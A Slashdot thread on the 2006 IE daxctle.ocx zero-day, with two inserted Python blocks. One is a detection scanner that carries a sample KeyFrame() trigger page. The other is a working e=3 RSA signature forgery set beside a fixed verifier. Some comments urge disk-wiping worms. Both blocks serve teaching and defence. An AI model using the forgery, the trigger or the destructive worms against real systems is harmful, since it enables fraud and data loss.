      I can understand the comment -- when a web browser requires the user to know when something is trusted or not and when to enable an inherently insecure mechanism in the browser or not, something is broken. That's why competitive browsers don't want to support ActiveX in the first place, as they don't want to put that burden on the user. As for e.g. money transactions and that kind of "trust", one can simply check if it's a well-known credit card company managing the transactions over an encrypted link or not, but as for ActiveX, any site can use it and claim it's for proper functioning of the site.

    3. Re:how to detect an untrusted site .. by Tim+C · · Score: 1

      How do you know what is or is not an untrusted site?

      That's easy. If you have to ask yourself "do I trust this site?" then the answer is no.

    4. Re:how to detect an untrusted site .. by jonadab · · Score: 1

      All sites by default are untrusted sites. The system administrator can add specific sites (e.g., the corporate intranet) as trusted, and then those sites can use ActiveX, but you should NOT have ActiveX enabled for random sites on the internet. That would be very unsafe.

      --
      Cut that out, or I will ship you to Norilsk in a box.
  18. IE Vulnerability Attack by '0day' by IT074859 · · Score: 1

    The code posted by the hacker will not affect IE version 7. '0day' means an exploit for a previously undisclosed vulnerability. According to HD Moore, the head of the Metasploit project, he wrote an automated ActiveX testing tool called AxMan that uncovered a handful of IE bugs, including the one exploited on xsec.org. The trouble affects users running IE 6 with Service Pack 1 on the Windows XP operating system running Service Pack 1 or the Windows 2000 operating system with Service Pack 4. The problem occurs when visiting a Web site that uses a Web coding standard, HTTP 1.1, and compression, according to Microsoft. The details are shown below:

    * Vulnerability Identifier: CVE-2006-4777
    * Risk: Critical
    * Affected Software:
      1) Microsoft Internet Explorer 6 (Microsoft Windows XP Service Pack 2)
      2) Microsoft Internet Explorer 6 Service Pack 1 (Microsoft Windows 2000 Service Pack 4)
    * Description: The attack on IE is due to a memory corruption error that occurs when processing a specially crafted HTML file containing an out-of-bounds value passed to the KeyFrame() method of a DirectAnimation.PathControl ActiveX object (daxctle.ocx). It can be exploited by a remote malicious user to either crash a vulnerable browser through denial of service (DoS) attacks or take complete control of an affected system through arbitrary code execution.

    This attack on the IE vulnerability is due to ONE thing only, which is ActiveX again.... Previously the big issue was IE version 6 suddenly crashing. So, now the worst nightmare comes back to haunt us..
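
An added detection example for the control described in the post above (Python; not code from the thread, xsec.org or Microsoft). It is the kind of content rule a proxy or mail gateway could run before the daxctle.ocx patch is deployed: it undoes the cheapest script obfuscation, looks for the control by ProgID or by <object> CLSID, and pulls out the first argument of every KeyFrame() call. The CLSID constant and the "plausible key-frame count" bound are my assumptions, and both sample pages are constructed, not captured traffic.

```python
"""Flag HTML that instantiates DirectAnimation.PathControl (daxctle.ocx) and
calls KeyFrame() with an out-of-range first argument.

Added detection example for a proxy or mail gateway; not code from the thread,
xsec.org or Microsoft.  The CLSID and the 'plausible' bound are assumptions.
"""
import re

PROGID = "DirectAnimation.PathControl"
# Assumed CLSID for the control (check it against the vendor advisory before
# deploying a rule that depends on it).
CLSID = "D7A7D7C3-D47F-11D0-89D3-00A0C90833E6"
# Heuristic: KeyFrame's first argument is a key-frame count; negative values,
# non-literals or anything above this bound are treated as hostile.  The bound
# is an assumption, not a figure from the advisory.
MAX_PLAUSIBLE_KEYFRAMES = 4096

_STR_CONCAT = re.compile(r'(["\'])\s*\+\s*\1')   # "Direct" + "Animation" -> "DirectAnimation"
_HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')
_ACTIVEX = re.compile(r'ActiveXObject\s*\(\s*["\']([^"\']+)["\']\s*\)', re.I)
_OBJECT = re.compile(r'<object\b[^>]*classid\s*=\s*["\']?clsid:([0-9a-f-]{36})', re.I)
_KEYFRAME = re.compile(r'\.KeyFrame\s*\(\s*([^,)]*)', re.I)


def normalize(text):
    """Undo the cheapest script obfuscations: split string literals and \\xNN escapes."""
    text = _STR_CONCAT.sub("", text)
    return _HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)


def parse_int(token):
    """Integer value of a JS numeric literal (decimal or 0x...), or None."""
    try:
        return int(token.strip(), 0)
    except ValueError:
        return None


def scan_html(html):
    """Return a findings dict; 'suspicious' is True only when the page both loads
    the control and feeds KeyFrame() an implausible first argument."""
    text = normalize(html)
    findings = {"loads_control": False, "keyframe_args": [], "reasons": []}

    for m in _ACTIVEX.finditer(text):
        if m.group(1).lower() == PROGID.lower():
            findings["loads_control"] = True
            findings["reasons"].append("ActiveXObject(%s)" % PROGID)
    for m in _OBJECT.finditer(text):
        if m.group(1).lower() == CLSID.lower():
            findings["loads_control"] = True
            findings["reasons"].append("<object classid=clsid:%s>" % CLSID)

    bad_call = False
    for m in _KEYFRAME.finditer(text):
        raw = m.group(1).strip()
        value = parse_int(raw)
        findings["keyframe_args"].append(raw if value is None else value)
        if value is None or value < 0 or value > MAX_PLAUSIBLE_KEYFRAMES:
            bad_call = True
            findings["reasons"].append("suspicious KeyFrame(%s)" % raw)

    findings["suspicious"] = findings["loads_control"] and bad_call
    return findings


# Constructed samples, not captured traffic.
BENIGN_PAGE = """<html><body><script>
var img = new Image(); img.src = "logo.png";
</script></body></html>"""

HOSTILE_PAGE = """<html><body><script>
var t = new ActiveXObject("Direct" + "Animation.Path" + "Control");
t.KeyFrame(0x7fffffff, new Array(1), new Array(1));
</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("hostile", HOSTILE_PAGE)):
        print(name, scan_html(page))
```

The rule deliberately reports `loads_control` on its own as well, so a site that wants no exposure to this control at all can block on that field and ignore the argument heuristic; the heuristic only exists to separate "uses the control" from "looks like the trigger". A string-splitting or hex-escape trick defeats a naive grep but not this scanner; anything heavier (eval of decoded blobs) needs a script interpreter, not a regex.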

    1. Re:IE Vulnerability Attack by '0day' by udippel · · Score: 1
      New here?

      In case you don't know, there's a Preview Button and 'Plain Old Text' if you don't happen to know HTML.

  19. Re:fux0r3d by rolandog · · Score: 2, Funny

    In capitalist America, your computer can have 'safe sex' by using the Firefox condom and taking the 'NoScript' pill.

  20. Real Damage by nurb432 · · Score: 4, Funny

    what ever happened to exploits ( be it virus, trojan, whatever ) that caused some REAL damage?

    All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something.

    --
    ---- Booth was a patriot ----
    1. Re:Real Damage by (H)elix1 · · Score: 1

      what ever happened to exploits ( be it virus, trojan, whatever ) that caused some REAL damage?

      3. Profit. Folks found there was money to be made off of a bot net under your control. Not uncommon to see an infected system patch itself so others can't infect the system.

    2. Re:Real Damage by owlstead · · Score: 1

      "All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something."

      Stop nagging and start typing.

    3. Re:Real Damage by nurb432 · · Score: 1

      Sorry, but too much risk. One thing about growing old is you leave that sort of risk taking to the new kids..

      --
      ---- Booth was a patriot ----
  21. Re:Yes, this affects IE7 but you are prompted by Psykechan · · Score: 3, Insightful

    Your link points out that IE7 is vulnerable but it will prompt you to run the ActiveX control before hosing your system. From the average user's point of view, they get a message asking to run something created and signed by Microsoft for the page to load. Tell me how many average users, even the relatively computer savvy, will allow the control to run?

    Throwing a constant barrage of OS/browser security pop-ups on the screen does not make it secure. Making it so that an exploitable control can be completely removed and not just "effectively removed" from the system helps make the system more secure but this is just a workaround. If the control was designed to be able to grant system level privileges to a web page then it's time to go back to the proverbial drawing board.

    If it wasn't designed that way, then patch it when you first hear about it over a month ago and stop complaining about people releasing it to the public. I would rather have everyone know about it than have just Microsoft, a few security people, and several black hats knowing.

  22. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  23. Since when is 0-day open to interpretation? by shaitand · · Score: 2, Informative

    Either they released the exploit code before the hole was patched or not.

  24. Re:kills windows by canuck57 · · Score: 1

    All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something.

    I for one am actually surprised this hasn't happened yet. Say a worm that infects 20 others then formats the hard drive. Or perhaps break into a botnet (they are not that secure) and wipe some millions of Windows PCs at once. It would not be hard to do, let your Windows get infected, figure out how they control it and go off and get control. Time will tell, but I suspect sooner or later someone is going to do it.

    I expect the performance of the internet will be greatly improved the next day.

  25. One thing I don't understand... by RobertM1968 · · Score: 1

    ...Is why these exploits and vulnerabilities are labelled "new".

    They aren't new. Maybe they have just been found, but on a product that's been out so long, the exploits have been too (unless of course they were introduced by a fix or update recently). I know it's just improper usage of the English language - kinda like the "new" planets we've found (that have been around for billions of years).

    The problem is, this creates a misconception in the casual user's mind as they think the exploit is new instead of just discovered.

    1. Re:One thing I don't understand... by VGPowerlord · · Score: 1
      English is known for having more than one meaning for any given word. For example, here's the first two definitions of new from Merriam-Webster.

      1 : having recently come into existence : RECENT, MODERN
      2 a (1) : having been seen, used, or known for a short time : NOVEL <rice was a new crop for the area> (2) : UNFAMILIAR <visit new places> b : being other than the former or old <a steady flow of new money>

      There's several other definitions for new on the same page.
      --
      GLaDOS for President 2016! "Well here we are again. It's always such a pleasure." -- GLaDOS, 2011
    2. Re:One thing I don't understand... by RobertM1968 · · Score: 1

      True - but those are all context based. By definition (whichever you choose) the proper wording would be new(ly) found exploits, et al - as in the definitions you cited, there are modifiers such as "new crop for the area" and "visit new places" is based off the perspective of who it is targeted towards (visiting New York might be visiting a new place to you, but not to me). The same with "a steady flow of new money" which is also based off the perspective of who the new money is flowing to/from.

      We all know there are a plethora of not-yet-found exploits in Windows. They aren't new, nor are they new in any perspective related to me or my computer experience (or lack thereof). Hence my point... the wording most widely used is misleading while "newly found vulnerability" would be more accurate in both portraying that the exploit has existed for quite some time, and that it has just been found.

      I just believe a more accurate portrayal is needed when it comes to computers and related things so that those who are not quite that computer savvy don't get misconceptions about what is really going on.

      This is kind of akin to stretching the definition of "Genuine" in an earlier post regarding MS' usage of the word.

  26. That RSA exploit probably appears elsewhere... by tjwhaynes · · Score: 1
    On the other hand the nature of the last round of exploits in Firefox is rather really interesting, and as such newsworthy. The cryptographic signature exploit especially warrants a rather interesting technical discussion.

    If you are interested in the work on RSA signatures, check out this OpenPGP posting. The chances are that there are other RSA signature implementations out there that are vulnerable to this sort of subversion and it will be interesting to see what other products actually publish fixes and acknowledge the flaw.

    Cheers,
    Toby Haynes

    --
    Anything I post is strictly my own thoughts and doesn't necessarily have anything to do with the opinions of IBM.
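
An added worked example for the RSA signature discussion above (Python; not code from the thread, Mozilla or the OpenPGP posting). It assumes the flaw being referred to is the 2006 low-public-exponent forgery: a PKCS#1 v1.5 verifier that walks the padding from the left and stops checking once it has matched the DigestInfo, so with e=3 an attacker can choose the ignored trailing bytes to make the whole block a perfect cube and never needs the private key. The lax and strict verifiers sit side by side; the 2048-bit modulus is a constructed, seeded value (the forgery does not care whether it is a genuine RSA modulus, only that it is large enough to leave slack for the cube), and the message is made up.

```python
"""PKCS#1 v1.5 signature verification, lax vs. strict, with the e=3 forgery.

Added example; it assumes the Firefox flaw mentioned above is the 2006
low-public-exponent forgery (verifier stops checking after the DigestInfo).
Not code from the thread, Mozilla or the OpenPGP posting.
"""
import hashlib
import hmac
import random

E = 3
K = 256                      # modulus length in bytes (2048-bit); the forgery needs the slack
SHA1_DIGESTINFO_PREFIX = bytes.fromhex("3021300906052b0e03021a05000414")

# Constructed 2048-bit public value, seeded so the example is reproducible.
# The forgery never uses a private key, so it does not need a genuine RSA
# modulus; any odd number of the right size with its top bit set will do.
N = random.Random(20060917).getrandbits(2048) | (1 << 2047) | 1


def os2ip(b):
    return int.from_bytes(b, "big")


def i2osp(x, k):
    return x.to_bytes(k, "big")


def digest_info(msg):
    return SHA1_DIGESTINFO_PREFIX + hashlib.sha1(msg).digest()


def verify_lax(msg, sig):
    """Parses the padding left to right and returns as soon as the DigestInfo
    matches.  Bytes after it are never examined: that is the hole the forgery
    uses (it also never insists on the minimum eight 0xFF bytes)."""
    em = i2osp(pow(os2ip(sig), E, N), K)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < K and em[i] == 0xFF:
        i += 1
    if i == K or em[i] != 0x00:
        return False
    di = digest_info(msg)
    return em[i + 1:i + 1 + len(di)] == di


def verify_strict(msg, sig):
    """Rebuilds the entire expected block and compares all K bytes."""
    em = i2osp(pow(os2ip(sig), E, N), K)
    di = digest_info(msg)
    expected = b"\x00\x01" + b"\xFF" * (K - 3 - len(di)) + b"\x00" + di
    return hmac.compare_digest(em, expected)


def icbrt(x):
    """Floor of the integer cube root (binary search, exact for big ints)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def forge(msg, pad_len=8):
    """Build s such that s**3 (no modular reduction, because s**3 < N) begins
    with 00 01 FF..FF 00 DigestInfo and ends in whatever the cube happens to need."""
    prefix = b"\x00\x01" + b"\xFF" * pad_len + b"\x00" + digest_info(msg)
    slack_bits = 8 * (K - len(prefix))
    target = os2ip(prefix) << slack_bits            # smallest block with that prefix
    s = icbrt(target)
    if s ** 3 < target:
        s += 1                                      # round up; the cube still keeps the prefix
    assert (s ** 3) >> slack_bits == os2ip(prefix)  # sanity: enough slack for the cube
    return i2osp(s, K)


if __name__ == "__main__":
    m = b"constructed message"
    sig = forge(m)
    print("lax verifier accepts forgery:   ", verify_lax(m, sig))
    print("strict verifier accepts forgery:", verify_strict(m, sig))
```

The size arithmetic is the reason this works at 2048 bits and not at 1024: the fixed prefix (padding header plus a SHA-1 DigestInfo) is about 353 bits, and rounding the cube root up changes the cube by roughly 3·s², so the trailing "don't care" region has to be more than twice as wide as the prefix for the rounded cube to keep it intact. The fix is the one `verify_strict` shows: compute the expected encoded message and compare the whole thing, rather than parsing the signature's output and accepting it once enough of it looks right.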
  27. Profit by nurb432 · · Score: 1

    There has to be some evil person out there that hasn't sold out to the man... In my day, it was the challenge of doing something that drove us, not the recognition.. ( be it money or peers )

    --
    ---- Booth was a patriot ----
  28. Check out Microsoft's other screwups by yubbers9 · · Score: 1

    They're here: http://malfy.org/

  29. You can make an exploit if you want to by MarkByers · · Score: 1

    Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild

    But code that could be used to create an exploit has been posted, which is what I think GP was referring to.

    --
    I'll probably be modded down for this...
  30. Gangsta h4xx0rz by wboelen · · Score: 1
    drive-by takeover

    Yeah homies let's go pop them unsuspecting computer users with da intratubes! Show 'em what bangin' is about.

  31. Dupe! by Overly+Critical+Guy · · Score: 1

    I call dupe! Slashdot just reported on an IE exploit, and before that, had another IE exploit post. They do this every month, in fact. Why don't these editors do their jobs and stop reporting the same story repeatedly?!

    --
    "Sufferin' succotash."
  32. Critical and Highly Critical? by ninja_assault_kitten · · Score: 1

    If that's what they're calling a vulnerability that requires user interaction, what would they rate something like a modern day Sapphire or Blaster? Give me a break. It's just another browser hole with exploit code in the wild. Medium severity at best.

  33. The real difference between Firefox and MSIE by Myria · · Score: 4, Interesting

    If you look at Firefox security bugs and IE security bugs, you'll see that there are more Firefox bugs than MSIE bugs in the exploit lists. There is, however, a big difference.

    When Microsoft finds a security hole themselves, they don't tell anyone, and they don't release a patch. They fix it in the tree for the next release of the OS. The only time they release a patch is when someone else finds the bug. The reason they do this is because if they release a patch, people will "bindiff" it against the previous version and find what is changed so that they can make exploits to use against unpatched users. You can't realistically "bindiff" XP vs. Vista, so they can obscure their security updates inside Vista.

    Firefox instead will issue patches no matter who finds them. This is why Firefox appears to have more bugs - you always see them get fixed.

    Melissa

    --
    "Screw Sun, cross-platform will never work. Let's move on and steal the Java language." - Visual J++ Product Manager
  34. Plugin for IE by univgeek · · Score: 2, Interesting

    Or whatever they are called.

    Why do people use IE? Mostly because of Intranet sites which serve up IE only content and work badly or not-at-all with other browsers. How 'bout an IE plugin which opens only Intranet/trusted sites in IE and opens all else in an external safe browser? Or is this unlikely to be useful?

    --
    All bow to his Noodliness!! His Noodle Appendage has touched me!
    1. Re:Plugin for IE by Verunks · · Score: 1

      you can use ietab to embed ie into firefox and use it when you wish or automatically use it when you go to some sites like windowsupdate or other custom sites

    2. Re:Plugin for IE by Anonymous Coward · · Score: 0
      It's a constant stream of articles just like this which made me discontinue business with three internet stock broker / banking concerns.

      Despite my constant whining to them regarding them taking security seriously, the only people I could talk to that were high enough to make a difference were also so high up that my concerns, as a lowly customer, were not important. Little guys like me don't mean all that much to multi-billion dollar concerns. They incessantly lace their site with proprietary stuff that forces me to use IE, as well as running JavaScript on, when simple CGI over the SSL link would have worked just fine. They would even use JavaScript links instead of HTML links just so I could not even navigate the site without enabling JavaScript.

      It's obvious to me that their expertise is NOT in coding or computer security, rather it's in the psychological maneuvering and office politics to find an executive that considers them worthy of a salary dozens of times what I would make.

      The weirdest thing was that the big companies I had to discontinue business with are supposedly the old-time leaders in the brokerage industry... and the guy I run with now is pretty new at it, compared to the old timers.

      He's not perfect ( at least in my book, anyway ) but best I've seen so far.

      What is it with big companies that makes them so lackadaisical and so lacking in common sense regarding other people's money? Is it that it's far easier to issue a EULA disclaiming responsibility than to do things simply and elegantly, using well known and documented methods?

      Some of the business sites rank right up there with the porn industry in the amount of unverifiable software I have to install on my machine in order to access their site.

  35. Moderators on crack by trezor · · Score: 1

    Me saying that Windows, the world's most used, sold and deployed user-focused OS, can be used relatively securely, and that people should choose the tool/OS that does the job that needs doing best, I get modded troll, while a Linux fanboy claiming that Linux solves all problems in the world, regardless of what the actual job at hand is (without any actual backing of course) doesn't.

    Great job, mods! Now you can mod this offtopic, trolling flamebait. I'm sure that the burning karma will fit right into your crackpipe.

    --
    Not Buzzword 2.0 compliant. Please speak english.
  36. Re:kills windows by 99BottlesOfBeerInMyF · · Score: 1

    I for one am actually surprised this hasn't happened yet. Say a worm that infects 20 others then formats the hard drive. Or perhaps break into a botnet (they are not that secure) and wipe some millions of Windows PCs at once. It would not be hard to do, let your Windows get infected, figure out how they control it and go off and get control. Time will tell, but I suspect sooner or later someone is going to do it.

    Yeah but who will notice? Windows is hosed and won't boot? Well, time for a re-install. Honeypots would probably be how people found out about such a thing.

  37. Safety first... by sii074306 · · Score: 1

    IE is not safe anymore.
    Why were hackers born into this world?
    Why don't they do anything other than hack?